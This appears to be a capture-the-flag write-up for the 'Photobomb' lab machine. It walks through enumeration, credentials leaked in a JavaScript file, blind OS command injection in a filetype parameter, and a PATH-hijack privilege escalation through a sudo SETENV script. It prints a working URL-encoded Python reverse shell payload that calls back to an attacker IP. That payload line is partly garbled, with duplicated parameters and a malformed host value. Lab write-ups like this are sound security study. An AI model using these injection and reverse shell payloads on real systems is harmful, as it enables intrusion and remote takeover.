Photobomb

Personal Rating: Medium

Enumeration

sudo nmap -sV <IP>

  • nginx 1.18 with a webserver on port 80 and ssh port 22 are open

  • There was interesting info in the source code:

<p>To get started, please <a href="/printer" class="creds">click here!</a> (the credentials are in your welcome pack).</p>
<p>If you have any problems with your printer, please call our Technical Support team on 4 4283 77468377.</p>

I continued with some dir fuzzing:

fuzzing:
	/printer
	/printers
	/printerfriendly
	/printer_friendly
	/printer-friendly	
	/printer_icon
	/printer-icon
	/printerFriendly	
-> All show the same page

When giving a non existing page, there is an interesting error:

There is a JS file containing http://pH0t0:b0Mb!@photobomb.htb/printer

You can download files. If you check the request with burp and test around with different injections, there is a different output if ;something is included. So there might me a blind OS command injection.

Blind OS Command Injection

If you inject at the filetype with this payload: jpg;ping+-c+4+10.10.16.4 you can see with tcpdump that the command has been executed.

Checking different reverse shell payload, none worked. Only if you use a specific python reverse shell, url encode = and &, and replace spaces with + it works apparently

This was the payload that worked in the end:

photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=jpgphoto=voicu-apostol-MWER49YaD-M-
	unsplash.jpg&filetype=jpg;photo=voicu-apostol-MWER49YaD-M-
	unsplash.jpg&filetype=jpg;export+RHOST%3d"10.10.16.4ls"%3bexport+RPORT%3d4444%3bpython3+-c+'import+sys,socket,os,pty%3bs%3dsocket.socket()%3bs.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))))%3b[os.dup2(s.fileno(),fd)+for+fd+in+(0,1,2)]%3bpty.spawn("sh")'&dimensions=3000x2000

SUID + SetEnv Script

sudo -l reveals, that /opt/cleanup.sh is an SUID binary where you also have SETENV permissions.

With setenv you can change the path for the program. Since find is called with a relative path, you can create a "find" that contains /bin/bash in the homedir of the user “wizard” and then execute the program, making use of the SUID and SETENV permissions:

sudo PATH=/home/wizard:/bin /opt/cleanup.sh

PreviousPaperNextPrecious

Last updated